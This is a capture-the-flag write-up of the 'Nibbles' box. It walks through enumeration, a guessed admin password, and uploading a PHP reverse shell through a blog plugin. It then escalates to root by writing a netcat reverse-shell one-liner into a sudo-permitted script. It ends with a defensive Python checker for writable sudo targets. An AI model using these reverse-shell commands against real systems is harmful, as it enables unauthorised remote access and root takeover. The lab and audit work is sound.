enumeration using nmap scan
From the output of the nmap scan I learned there were 2 open ports, and the one I had to look into was port 80.
Navigating to the target address in Firefox, the website didn't have any juicy info, just the plain text saying Hello world!.
I right-clicked on the web page and viewed the source code without any expectation, but there was this interesting comment.
I navigated to /nibbleblog as the comment hinted.
more information gathering with gobuster
While on the /nibbleblog web page I could not find any more useful info, so I decided to run gobuster against the website to gather more information.
The gobuster output showed many directories, but the results were not satisfying. I knew there had to be more, so I ran another gobuster scan, this time adding the -x option to search for specific file extensions.
/admin.php was the first result that caught my eye.
/nibbleblog/admin.php
I didn't have anything for the admin credentials until I found the users.xml file, located at the following path: /nibbleblog/content/private/users.xml
The title of the nibbleblog was nibbles, so why not try that for the password? It turned out that it was the password. I was skeptical about guessing the password, but later I referred to other people's write-ups and all of them also did some guesswork to figure out the password. I guess it's an important part of pentesting.
a screenshot of the admin dashboard page
Under the /plugins directory there was the My image plugin page, where I could upload a file to the server, and I knew I could use this to upload a reverse shell payload for the exploitation.
For the reverse shell payload, I downloaded the popular pentestmonkey php-reverse-shell.
After uploading the payload file, I had to manually navigate to the following path to run it on the server:
/nibbleblog/content/private/plugins/my_image
netcat listener successfully captured the reverse shell.
got the user flag!
Oh, I almost forgot. As you can see from the screenshot below, I upgraded the shell to a fully interactive TTY shell.
# reverse shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
# press ctrl + z to background the shell

# kali
stty raw -echo; fg
reset

# reverse shell
export SHELL=bash
export TERM=xterm-256color
privilege escalation
With the reverse shell, the current user, nibbler, was not able to access the root directory, so I had to figure out a way to escalate privileges. I ran the sudo -l command to list the commands I can actually run with sudo, and I could run the following:
/home/nibbler/personal/stuff/monitor.sh
This is the part where I needed some help. I couldn't figure out what I needed to write inside the monitor.sh file for privilege escalation, so I referred to one of the walkthroughs online.
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.15 1235 >/tmp/f' > /home/nibbler/personal/stuff/monitor.sh
After modifying the content of the file, I opened another netcat listener on a different port, 1235, because port 1234 was already listening for the original reverse shell.
sudo /home/nibbler/personal/stuff/monitor.sh
The id command returned that I'm the root user.
successfully got the root flag
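The escalation above only works because a sudo rule lets nibbler run, as root, a script sitting in a directory nibbler owns and can write to. As an added defender's check (not part of this write-up or the box), the script below parses sudoers-style rules and flags every granted command path that the rule's user could modify directly or replace through a writable parent directory; the user name, paths and sample rule are constructed for the demonstration.

```python
"""Audit sudo rules for command paths the granted user can overwrite (added example)."""
import os
import re
import stat

# user  host=(runas)  [TAG:] command, command ...  (simplified sudoers grammar)
RULE_RE = re.compile(r"^\s*(\S+)\s+(\S+)\s*=\s*(?:\(([^)]*)\)\s*)?(.+)$")


def parse_rule(line):
    """Return (user, [absolute command paths]) for one sudoers rule, else None."""
    if not line.strip() or line.lstrip().startswith(("#", "Defaults")):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    user, _host, _runas, cmds = m.groups()
    paths = []
    for cmd in cmds.split(","):
        cmd = re.sub(r"^(?:[A-Z]+:\s*)+", "", cmd.strip())  # drop NOPASSWD: and other tags
        if cmd and cmd.split()[0].startswith("/"):
            paths.append(cmd.split()[0])
    return user, paths


def writable_by(path, uid, gids):
    """True if uid (member of gids) can modify path, or replace it via its directory."""
    if uid == 0:
        return True
    for p in (path, os.path.dirname(path)):
        try:
            st = os.stat(p)
        except FileNotFoundError:
            continue  # a missing command still counts if its directory is writable
        mode = st.st_mode
        if ((st.st_uid == uid and mode & stat.S_IWUSR)
                or (st.st_gid in gids and mode & stat.S_IWGRP)
                or mode & stat.S_IWOTH):
            return True  # sticky-bit directories are not special-cased here
    return False


def audit(rules, user, uid, gids):
    """Return every command path granted to `user` that uid/gids could modify."""
    findings = []
    for line in rules:
        parsed = parse_rule(line)
        if parsed and parsed[0] == user:
            findings.extend(p for p in parsed[1] if writable_by(p, uid, gids))
    return findings
```

Run it as the user whose rules you want checked, feeding it the lines from sudo -l or a sudoers file; any path it returns is a script that user can turn into a root shell the same way monitor.sh was.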